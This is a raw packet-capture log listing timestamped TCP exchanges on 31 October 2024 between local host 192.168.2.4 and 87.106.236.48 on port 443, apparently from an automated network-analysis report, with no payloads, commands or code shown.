                                                                                                                                            Oct 31, 2024 17:12:37.645756960 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.718338013 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.718364000 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.718441963 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.718457937 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.718472958 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.718487978 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.718724966 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.718739033 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.718780041 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.718784094 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.718820095 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.719279051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.719295025 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.719338894 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.719342947 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.719367981 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.719383955 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.747682095 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.747703075 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.747783899 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.747803926 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.747836113 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.748392105 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.748405933 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.748435020 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.748440981 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.748466015 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.748482943 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.749114037 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.749128103 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.749181032 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.749186039 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.749217033 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.761555910 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.761580944 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.761615992 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.761620045 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.761642933 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.761666059 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.762325048 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.762339115 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.762392044 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.762397051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.762428045 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.762772083 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.762785912 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.762820959 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.762826920 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.762850046 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.762866020 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.836599112 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.836648941 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.836689949 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.836714029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.836725950 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.836745977 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.837385893 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.837408066 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.837440968 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.837446928 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.837469101 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.837486982 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.838012934 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.838036060 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.838077068 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.838083029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.838109016 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.838809013 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.865070105 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.865118027 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.865144968 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.865166903 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.865220070 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.865284920 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.865890980 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.865917921 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.865981102 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.865988016 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.866023064 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.866404057 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.866444111 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.866458893 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.866465092 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.866497993 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.866513968 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.878742933 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.878765106 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.878853083 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.878873110 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.878906012 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.879621983 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.879636049 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.879848003 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.879862070 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.879914999 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.880402088 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.880414963 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.880467892 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.880480051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.880512953 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.952409029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.952435970 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.952693939 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.952723026 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.952764988 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.953079939 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.953094006 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.953145981 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.953150988 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.953185081 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.953564882 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.953578949 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.953610897 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.953617096 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.953639984 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.953659058 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.981975079 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.981991053 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.982117891 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.982130051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.982172966 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.982744932 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.982758045 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.982816935 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.982821941 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.982856989 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.983536959 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.983551025 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.983606100 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.983611107 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.983645916 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.995632887 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.995647907 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.995754004 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.995762110 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.995807886 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.995815039 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.996246099 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.996258974 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.996311903 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.996316910 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.996351957 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.996864080 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.996877909 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.996932030 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:37.996937037 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:37.996967077 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.069402933 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.069447994 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.069596052 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.069627047 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.069639921 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.069664001 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.070053101 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.070069075 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.070123911 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.070128918 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.070161104 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.070719004 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.070744038 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.070791960 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.070796967 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.070832014 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.098649025 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.098670959 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.098742008 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.098766088 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.098798990 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.098818064 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.099194050 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.099208117 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.099260092 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.099266052 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.099311113 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.099848032 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.099862099 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.099917889 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.099927902 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.099975109 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.100509882 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.100523949 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.100573063 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.100578070 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.100610971 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.113081932 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.113120079 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.113218069 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.113228083 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.113245964 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.113261938 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.113693953 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.113708973 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.113765001 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.113770008 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.113805056 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.114413023 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.114427090 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.114481926 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.114485979 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.114521027 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.186465025 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.186489105 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.186695099 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.186722994 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.186763048 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.186990023 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.187005997 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.187056065 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.187061071 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.187097073 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.187700987 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.187716961 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.187767982 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.187772989 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.187809944 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.216686964 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.216717005 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.216866970 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.216883898 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.216922045 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.217170954 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.217191935 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.217252970 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.217258930 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.217293024 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.217771053 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.217794895 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.217828989 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.217835903 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.217875004 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.218606949 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.218632936 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.218682051 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.218687057 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.218703032 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.218728065 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.230159044 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.230185986 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.230273008 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.230285883 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.230318069 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.230767965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.230782986 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.230833054 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.230843067 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.230875015 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.231324911 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.231338978 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.231384993 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.231395960 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.231427908 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.274966002 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.275022030 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.275044918 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.275054932 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.275077105 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.275099039 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.303711891 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.303746939 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.303788900 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.303802967 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.303829908 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.303847075 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.304425955 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.304445028 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.304482937 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.304492950 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.304517984 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.304531097 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.305088997 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.305109024 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.305155993 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.305161953 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.305197001 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.334712982 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.334736109 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.334880114 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.334907055 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.334949017 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.335448027 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.335462093 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.335513115 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.335521936 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.335562944 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.336143970 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.336158991 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.336211920 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.336220980 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.336249113 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.337033033 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.337048054 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.337096930 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.337105036 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.337133884 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.347779036 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.347798109 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.347866058 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.347881079 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.347919941 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.348619938 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.348634958 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.348690987 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.348695993 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.348731041 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.351484060 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.351497889 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.351563931 CET49761443192.168.2.487.106.236.48
